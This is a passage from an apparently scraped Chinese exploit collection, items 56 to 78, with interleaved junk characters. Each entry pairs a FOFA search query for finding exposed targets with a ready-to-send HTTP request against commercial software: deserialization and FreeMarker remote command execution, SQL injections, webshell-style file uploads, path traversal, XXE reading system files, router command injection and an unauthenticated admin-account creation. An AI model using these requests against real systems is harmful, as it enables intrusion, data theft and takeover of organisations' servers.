FOFA:app="畅捷通-TPlus"& Q/ u. G3 S5 s  s( W
第一步,通过% F4 ]5 S% u& ?* c
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
, a2 }* D- U1 ?3 a! [& W第二步,利用获取到的Cookie请求
! G$ c' l5 b2 c+ {# X6 A/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
0 I$ z* K' r! I# u- z) A
. z" s* r9 G+ R/ \! Z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
) X" Z2 {- R4 l+ t6 @FOFA: app="畅捷通-TPlus"% y; F) [! `6 D2 `& w
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.17 V2 b$ c. E2 I. ]2 }
Host: x.x.x.x
: f2 k' L) \6 b& r( cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ Y$ z$ q& \0 ]2 H' hContent-Type: application/json7 h; u6 I9 e5 M5 l& b  ]
/ u3 X1 O& L7 d
{
+ ^, j( B# |- j3 X, {  "storeID":{
. n0 \' c' {! N    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",5 ]9 r8 p" e) J
   "MethodName":"Start",/ \8 A8 z! i  q* Y& G- |
    "ObjectInstance":{5 Z2 b5 T% w+ y! m* W
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 B* S& m/ {% z! v6 k        "StartInfo": {
% g: S4 i: j7 s! F$ V$ V- P7 D           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% x( i# {) a; U* [  R           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"4 J8 R/ L  i7 Y3 {
       }- v8 e/ s" ?/ _7 ?
    }
; r, X# u" b6 r7 X, s( h6 }) _- a2 E  }
7 N1 V3 x+ H# ~2 ~}
5 ^8 |) X! H; p6 ~6 |( u5 r% D3 w7 j: ?4 F# H

% Y5 v9 _7 j* o' O0 C57. 畅捷通T+ keyEdit.aspx SQL注入
  p$ m4 B. q0 f& M2 }* DFOFA:app="畅捷通-TPlus"
! f7 V! O  ], {+ ?% ^# V4 y& MGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1# M: |. n4 a  B& I
Host: host, [4 S: Z' _* [3 H
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 ^  E6 V+ U$ \7 H1 q" c
Accept-Charset: utf-8
* O& o: v. u- NAccept-Encoding: gzip, deflate1 _# b6 F# A- E' H0 }, l9 \
Connection: close
" c/ @) Y, W* G
" w+ m) q0 y( i* A$ y
1 X! a5 A/ W" e! }# q( u1 y58. 畅捷通T+ KeyInfoList.aspx sql注入
) X( t" H$ ?% {- i1 aFOFA:app="畅捷通-TPlus"- @/ F. p. h1 t% q, m, y
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1+ G4 U7 Y: J3 U: @: @* a( _0 `
Host: your-ip& M9 y; d0 a" {9 ^4 z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36  ]. b# J9 [% `6 e5 _$ k6 e
Accept-Charset: utf-8
$ X4 B* w3 H, @+ jAccept-Encoding: gzip, deflate. [+ }+ g( ~  Z- B. d$ c* [$ H
Connection: close- u+ Z0 x; ]% y* Y. l2 G2 T  F
: e, o. _" {4 J

6 {# R: X' ]7 q2 p. \# U$ m! E59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行2 z" m9 Z! Z6 d8 ]
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
6 g. U% O: e" p* n( w- B, s/ yPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
% @6 K5 L4 C& GHost: 192.168.86.128:9090
6 m( {# ^$ H+ @User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; D& B5 w/ Q9 Q( `1 v# X- o
Connection: close
" a' j* Q) V+ Z* W! AContent-Length: 16693 Y" @# B. W9 F( L/ \& \
Accept: */*  p1 E+ q# t' [1 M
Accept-Language: en
# V. b  N0 B* d, @Content-Type: application/x-www-form-urlencoded
* d/ a3 ?$ J- }7 a: CAccept-Encoding: gzip
  [* R& y3 I/ f) y+ i. l& T  s+ D1 {# O! l4 q
PAYLOAD1 q3 ]) V: m6 \1 R
7 b6 i; Y) v: {+ l/ g5 N

- h: O# g9 H3 x$ n; ?  ~0 b4 b9 `60. 百卓Smart管理平台 importexport.php SQL注入  A& ~2 p% C6 V, o' U8 A  S
FOFA:title="Smart管理平台"
9 b& j# A4 `& o" b" Q! p$ t2 j5 MGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1$ [5 s3 V( f7 V: h1 R
Host:( S1 A1 N8 A' _0 |; A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) {) m5 k7 @$ X0 T7 {' m8 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' H/ g# H8 N/ C! u" K/ [
Accept-Encoding: gzip, deflate
$ M2 D& M1 l6 j/ cAccept-Language: zh-CN,zh;q=0.9
  E5 r/ j2 G- o$ \+ ZConnection: close, D* T+ u9 Y% I1 c

! \" B  O! p+ T2 ]/ y
0 Y( W5 u% A" z) T. l. n* o61. 浙大恩特客户资源管理系统 fileupload 任意文件上传6 P7 E$ {4 e1 o; b
FOFA: title="欢迎使用浙大恩特客户资源管理系统"  G& c. [! x6 v- A; t* z! W% Q
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1) t' }! j( J( `6 G4 y& o8 J
Host: x.x.x.x1 J' O' T  w$ `1 n: d7 D8 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) L7 M% s- x  e/ a
Connection: close# e. q7 p# g, ~
Content-Length: 27
8 ]/ `1 \! K8 b) t6 q; X. t4 }Accept: */*
- j, H# n% P7 |& i# B" xAccept-Encoding: gzip, deflate6 Q7 ^% f; U6 {
Accept-Language: en
. ~3 ~# @7 A+ _  |& k$ ]Content-Type: application/x-www-form-urlencoded
" d3 X5 _+ ?! f. @# _6 t( v# j. m5 _0 j' a" d1 \
8uxssX66eqrqtKObcVa0kid98xa
' n7 j+ _& N& \' U4 N2 N9 \) P; _, ^" i' w# Y& x3 Q

& \; P- f. ~4 a+ @( t62. IP-guard WebServer 远程命令执行
$ x6 t; z! @& qFOFA:"IP-guard" && icon_hash="2030860561"& d% P7 }! t2 v5 D  i
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.10 P, W, c+ D. j, {1 e' C
Host: x.x.x.x$ C% E; t& |, x2 D
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
1 \0 p2 T; G: z$ e" KConnection: close0 ^. Q2 b3 c5 R
Accept: */*
  g  v; @! M' s% s5 N, w/ BAccept-Language: en. x9 L/ v9 R$ Y3 _& ~
Accept-Encoding: gzip8 {2 L: g$ D; V7 M- b' O! |- P/ s

5 b! c4 m! k2 ~2 Z/ z
% H" K1 U; o- M# J& D, v访问
+ h- p; {. I$ Y  t: M+ k" H7 h- T( e" b8 T% l  `. I* Y! P7 t8 |7 p- s& a
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
* S7 A* f/ \2 p0 n( cHost: x.x.x.x/ d( M! y" g( Q% u; a
! S0 e  B. j+ }, X! z

" P! @% I% M6 }6 J+ Z1 w63. IP-guard WebServer任意文件读取
9 j8 ]. a  P$ i4 b4 ^4 pIP-guard < 4.82.0609.0
5 }7 s6 l6 _, v4 `! @) ~FOFA:icon_hash="2030860561"
" k0 A! p9 a. {4 R# R5 vPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1; o' N! A8 ~$ Z6 I/ s
Host: your-ip2 x/ s& k; S+ ~# {! Y% ^' f5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 d! t- c* n) V  g  DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 e. f/ G) F, C0 K& i
Accept-Encoding: gzip, deflate
: ~1 Z, F4 K8 a3 u5 @' M. R0 VAccept-Language: zh-CN,zh;q=0.9$ i2 b* j* U+ \
Connection: close
  V: H+ u# O/ L+ Z" dContent-Type: application/x-www-form-urlencoded( J# [% u$ w" E
9 P" w. D  ]! h, w* S7 F
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
% a2 F' \0 P! b& b
# f, w3 Y/ K8 T5 d" P) `$ v/ n* N64. 捷诚管理信息系统CWSFinanceCommon SQL注入
0 K/ ?0 K6 J5 \1 j% A- dFOFA:body="/Scripts/EnjoyMsg.js"
# y2 W+ z0 Y" {POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
$ [# u3 u: Q; b, ?$ d9 YHost: 192.168.86.128:9001
9 z* o' P1 W  F! h7 b& i" B+ ~User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36; _% b% v2 R+ Y& Q
Connection: close2 b* A7 ~) v( `
Content-Length: 369
4 s* a+ S2 w: `8 v: D% ZAccept: */*$ u- H( q  B' ~" T$ l1 R
Accept-Language: en9 U+ q8 y) Z* z0 k/ F4 j
Content-Type: text/xml; charset=utf-8( K- c/ y+ J4 X* Q* z1 d
Accept-Encoding: gzip
3 z! ^' _2 A8 z9 i
; K% H! B# ~2 `' Z, _<?xml version="1.0" encoding="utf-8"?>- L: R- r2 i8 S0 q& s- g7 P
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 a9 l% q9 S! G. V+ Z<soap:Body>1 {; C3 l2 O" f" W
    <GetOSpById xmlns="http://tempuri.org/">" h, r5 O- w0 K
      <sId>1';waitfor delay '0:0:5'--+</sId># u8 Z# @& N/ F
    </GetOSpById>
% z- @9 ]1 [  d( ~, d+ I  </soap:Body>! P9 z3 N, Q$ m& V# P$ w; |
</soap:Envelope>8 d. H4 j4 K8 \5 I

' D: q8 N, u6 u+ c5 X0 Y7 b0 K+ V0 F7 g  V# @; z" a2 s. ~3 B+ w. U
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" q) I5 C% m& \/ b& K
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"+ p8 [9 h' A" A' O1 U5 F% W! U
响应200即成功创建账号test123456/123456+ ?9 Z4 M( Y8 w$ e1 G4 s6 z
POST /SystemMng.ashx HTTP/1.1
* y9 H3 l- Y! v+ B2 ~Host:( n0 D2 E+ }( ?2 P2 o
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
% P4 K; w! i/ j$ iAccept-Encoding: gzip, deflate- x  }, ?( k$ Q7 @2 D0 d, H
Accept: */*) D. j7 s8 u: W$ w( t
Connection: close
, D( ?$ `- t! q. jAccept-Language: en0 z5 _/ a. D. h6 C; z
Content-Length: 174
% T& U5 i  l* s  I
- W9 N; T7 U9 @0 \8 b. OoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
0 t0 I' s7 S) X  q* G0 ]% h9 V: `

! m* @- p7 f  m4 \66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入2 Q& I$ \* h% z9 e, u
FOFA:app="万户ezOFFICE协同管理平台"
' B* [0 R* n  f$ j% B; ?/ e1 o; a9 Z: }& Q( {5 K6 Z
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 H. R8 X- j/ z& R
Host: x.x.x.x5 h1 _6 V2 w) S7 [6 L8 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 w1 y  @6 ~6 e% ^Connection: close
  \2 _" D, h, z' ?6 wAccept: */*9 I8 ~( l6 `8 B) N
Accept-Language: en
/ B; O8 F: v3 n2 O) a7 w5 zAccept-Encoding: gzip
9 Y9 H, ]0 H) E/ b( K7 ^- ]/ Z7 k

, ~3 s' k! Z! @1 J第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在6 a; {, Z* E  h$ h( Q1 l  Z
" N$ \/ k* z, @1 w4 q( G- L7 K6 S4 M- I
67. 万户ezOFFICE wpsservlet任意文件上传
$ C: n( u: W: H' g; o: i! NFOFA:app="万户网络-ezOFFICE"# j6 m/ f2 `1 J- U
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
' `( J1 d/ P) o$ b5 F9 W. iPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1( Y/ e  X! ~5 w/ N
Host: x.x.x.x4 j/ {$ {+ n* q" I& d$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0# z- o3 u# F4 x  @
Content-Length: 173% R' e4 ~, N& w; n9 }& T' U4 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/ Z% y' u* b* d, P  e) c! v
Accept-Encoding: gzip, deflate" w; |% H+ d, \
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3# o: e! u1 _1 M, \; C
Connection: close$ l' Z2 m6 m  o7 }9 t
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
! a1 K4 G( E3 f" u: Q( Z( A0 d- QDNT: 1
. R9 `8 g$ l  K8 lUpgrade-Insecure-Requests: 1
7 u8 h# X" R( t
% x* Z; c+ R, [4 W--ufuadpxathqvxfqnuyuqaozvseiueerp
! O8 D9 x$ Y+ }8 F+ t5 YContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
% `3 r' `) I: Y0 l2 J$ a0 L0 d5 ]" [; |& L" W# Z
<% out.print("sasdfghjkj");%>
4 M* q- u8 J. q* k! O: }--ufuadpxathqvxfqnuyuqaozvseiueerp--4 i& ?8 D: s% E  T( o% e% Z- w

4 s! D7 \3 e) L, c+ z% Z
5 Y% P* M: _$ Q6 I文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp  o1 W, l. F. o, c  @+ ]) F2 J+ ?

9 b! ?1 a+ D( q  Q0 [68. 万户ezOFFICE wf_printnum.jsp SQL注入
* Y$ g7 N3 B) K7 W2 Q6 o+ CFOFA:app="万户ezOFFICE协同管理平台"
" G( o, o2 D4 G' r+ tGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
. @' X) Z, M* O/ n( U) e8 T; mHost: {{host}}
! X5 n, R) [8 c/ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.360 b- J/ m$ F& x# |/ y' j
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
* F5 A% o6 n) JAccept-Encoding: gzip, deflate2 r8 q; `. p/ H- L; z! Y6 u" O4 O% j
Accept-Language: zh-CN,zh;q=0.98 }: f$ j+ C$ a9 Y% x1 v( ]% ^' a
Connection: close5 S  i: t8 l1 {/ w: Z9 ^
2 L: G- L" D9 s( [% _, f
. V" E! D+ Z# @& p2 i: Y* m
69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 R# x1 i' _' S+ xFOFA:app="万户ezOFFICE协同管理平台"5 o4 ]& {" Q- e% }+ q0 R
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
$ b, U$ i  v) s& E9 C! p' NHost: your-ip
5 M/ @8 ~0 c# W$ R3 b4 X8 x/ b& YUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
. K. H' [& r2 Q* L6 yAccept-Encoding: gzip, deflate
: \) p: ?5 D/ U" i! P! B: m3 E5 LAccept: */*
9 P5 j, T6 t4 d+ I& TConnection: keep-alive' A& Y+ C: |2 z8 t; ?% R+ i! W
7 B7 [5 n0 m4 r6 X3 }
! u3 e6 A: n7 z( E
70. 万户ezEIP success 命令执行
: x. Y2 W! l! b# M! Y0 _0 @' qFOFA:app="万户网络-ezEIP"
, r; K! l& Q! V% kPOST /member/success.aspx HTTP/1.1! K$ X( j  e& w+ L) }  d- ?
Host: {{Hostname}}
( T! e. ?" }8 Y! k' rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# Z) O; Q" n3 ZSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
; J- L( h+ {# @' Q1 \Content-Type: application/x-www-form-urlencoded' }3 Q1 @5 A. l& N; \
TYPE: C6 p2 m) i# S  f6 m! n! ?" B/ _
Content-Length: 16702  H% K) d( v6 z+ b1 X) F
. F/ X8 @2 p1 O5 X8 V# g
__VIEWSTATE=PAYLOAD
0 b% U) G8 \) v% C2 Q3 W6 {1 R5 F5 S' O0 v9 A4 y

- i3 R5 f9 d. [) t71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入. S  s: E3 w- N) u
FOFA:body="PM2项目管理系统BS版增强工具.zip"
) [: O+ M1 B) a$ `2 c! g0 HGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.17 \# M  O/ p" s
Host: x.x.x.xx.x.x.x5 f4 y6 c" b( ?! C" A$ ^3 y3 h3 d
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" i4 Y! {9 J- A' j  }$ u0 |+ ]0 H
Connection: close
% m' f  T6 j8 C8 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! s3 G: o3 K4 e$ U
Accept-Encoding: gzip, deflate/ u1 @, }" w( M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- h# ]: Y" ]% a  j2 ]Upgrade-Insecure-Requests: 1
  I) Q- y# x1 P+ l
8 B% {8 L5 l9 `7 P0 \' s$ h" p6 w& _% A% a
72. 致远OA getAjaxDataServlet XXE
- L6 b6 S$ t8 R8 {) N, X* [FOFA:app="致远互联-OA"4 `& E3 G. U& G( ~% V
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1# n0 k: X2 m# z  `) V# L  K
Host: 192.168.40.131:8099+ ]2 S0 W1 l" ^
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
! l- W+ a! @0 o2 h7 |Connection: close
  w/ B) F( }2 _* Y' R" p, x: X! u1 |Content-Length: 583! i; d: @  ^. s4 J
Content-Type: application/x-www-form-urlencoded. L. x0 K7 ~8 a" |: U. A
Accept-Encoding: gzip" c" M3 Z" W/ M  f% [/ v4 N

) |1 e# n3 u/ y5 g+ c; l& qS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
, {" |8 g' k1 E3 R% t  G2 _
# z$ N$ \8 M8 R" S) I' P1 f: Z8 W( b  E
73. GeoServer wms远程代码执行
) F! K9 B# b4 L: U$ F$ vFOFA:icon_hash=”97540678”' Q) C9 I. Q% e: X" f2 \  _
POST /geoserver/wms HTTP/1.1
4 w1 H( i+ h9 PHost:
5 G" l* m8 S. l2 c9 Y- ^# _$ yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 E6 J  N# k% u" aContent-Length: 1981
+ R- n5 T- X5 k$ z$ y. R6 GAccept-Encoding: gzip, deflate
$ j7 m) n# j. N' ^9 d" T+ e/ e# h6 [Connection: close
+ D* l/ Y8 x3 Q5 n0 @9 A# y- sContent-Type: application/xml
6 h* u% q2 R* s# k; m* o: mSL-CE-SUID: 3) A$ G  O% |) z" h7 P. s6 u% W
: y1 l3 k( r8 P8 {1 _
PAYLOAD% i( B# T6 h9 Z6 Z- v9 i$ ?
3 Z- p) I% o0 i. x  `$ H
& W: B5 e: U: N2 k8 [
74. 致远M3-server 6_1sp1 反序列化RCE2 `# S/ D. _) S2 I0 }
FOFA:title="M3-Server"
1 u+ v) g: ?: J5 s; C, H& _- aPAYLOAD
5 u* q$ Z; X1 F5 a  ?: h% |* |  o0 s9 z* H2 K
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
! a, ?4 L) o. x8 P% sFOFA:app="TELESQUARE-TLR-2005KSH"( m. C3 }# ^6 r0 u- w; ^$ r
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
/ n3 I% V+ ~7 UHost: x.x.x.x
, L+ M7 C% t; VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ [9 o) S  v& S4 N& GConnection: close
% W) C/ M5 a- S, f3 m. sAccept: */*
5 X4 S! m9 e7 d3 K, ~2 \* F1 \Accept-Language: en
0 s. `/ y' O" ^8 EAccept-Encoding: gzip  ~* C/ o" h; J7 g' ~( ^

/ F9 E8 w2 A* C; O
" z2 W. T! m+ R1 n6 ?) M2 RGET /cgi-bin/test28256.txt HTTP/1.18 T- s1 t4 K* @$ G
Host: x.x.x.x5 z" M$ Z* X( p7 J$ C
  Q" r1 {0 Y; j

3 c# a( h; F( v- K76. 新开普掌上校园服务管理平台service.action远程命令执行, a4 T# h, t6 |2 s6 x
FOFA:title="掌上校园服务管理平台"
* r9 I& ]7 Z' g3 T* a: }, \, d! {( fPOST /service_transport/service.action HTTP/1.1" I9 B* n% C1 D! O6 a
Host: x.x.x.x
7 e# y/ R! N' y/ {, dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
: a  Z+ u- C; P: hConnection: close2 t& ^& q( U$ P" s! ^
Content-Length: 2116 v0 ^; ]4 ~1 k7 q* h+ ]8 l, H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* O2 [/ y8 `4 [0 T" ~! A; V  l0 b, g
Accept-Encoding: gzip, deflate8 l9 Y/ j4 t4 U9 k. U- C( D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; p; _4 |( U& \Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
9 R* V- j3 N- O# J% d3 J1 Z+ aUpgrade-Insecure-Requests: 1
8 W+ A5 [9 g* D# g/ n$ S
" z/ v5 F. k2 g( G$ l! v/ }{& j" Q1 n6 S& ~* a. O3 {
"command": "GetFZinfo",2 {" M6 e* O  D1 Q, M, H
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
: k2 D0 \, u& B) q6 {  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}") E" V/ ~' M8 p1 \% w
}, o* x2 V) }: o7 u2 w2 `" v
' S1 _3 g% e. T/ G6 I( ?

. h2 p: X& `) |( L2 x% G/ w8 wGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1% M$ s- c, M1 p7 B8 u
Host: x.x.x.x
* V* u) {/ Z2 t+ H3 d5 |
- K4 D. l; d7 N
7 b0 B, v" B" T( {5 b! P
" R; S7 }  }- S$ v% R& H& V77. F22服装管理软件系统UploadHandler.ashx任意文件上传
3 P, E9 c3 `) a; {FOFA:body="F22WEB登陆"
+ Y3 u; E) F8 ]5 @! e  NPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
6 A# A+ Q9 M5 e7 n6 c8 bHost: x.x.x.x6 P; L$ g) L. z% B* C8 y6 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* c- [4 C: Q) A+ U7 N) mConnection: close1 \$ O' ~" h$ ]0 Y* {9 q
Content-Length: 433
5 l4 j2 W! h5 L9 C3 DAccept: */*! K4 D9 O( b* J8 `8 ]
Accept-Encoding: gzip, deflate
( k2 k$ O' H2 N* h& t* qAccept-Language: zh-CN,zh;q=0.92 @6 [/ j& b  U" D: h
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix0 P" z( X3 M; w7 ~6 S
: o5 J' V& r& \8 R7 U( J; ~
------------398jnjVTTlDVXHlE7yYnfwBoix
# P0 S* X5 O9 e/ q2 g2 HContent-Disposition: form-data; name="folder"
: r0 H+ o' @! G; U
) t3 `* T2 T7 N/upload/udplog
, C' Y4 a5 u; w5 F( S------------398jnjVTTlDVXHlE7yYnfwBoix
) s% n+ @8 D) [* I& j( h! @Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
& J$ {1 P2 h) ^! _Content-Type: application/octet-stream
0 E& V& [; k- d  h+ k; O; Q* ]& [
7 @. `4 z$ _' s! ]hello1234567* k, @/ R" \/ E/ ]* j/ r
------------398jnjVTTlDVXHlE7yYnfwBoix
0 _" m7 l4 {0 n0 _7 L" ZContent-Disposition: form-data; name="Upload"- v0 ^" G6 `$ s" a& w% H
' z- ]6 ~! K% p* c8 Q0 o5 e
Submit Query
. f. A: d$ C9 z+ ~------------398jnjVTTlDVXHlE7yYnfwBoix--
3 [' |* j+ k! Y0 }) h" b* i8 E
% R& O0 q0 G: h0 `3 X) ~5 J
  j6 i2 B. D- c! ~8 M/ T6 P- s# n- Y78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传$ \3 c6 a4 j( r3 Q- N
FOFA:icon_hash="2001627082"
# B. y% L4 s$ Z( vPOST /Platform/System/FileUpload.ashx HTTP/1.1) _$ z" Z) `7 [+ E
Host: x.x.x.x, E8 i: `) g% h+ \- M0 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 q% n  I2 b, c1 K1 dConnection: close
; l# i& a8 A4 b- I& ]Content-Length: 336
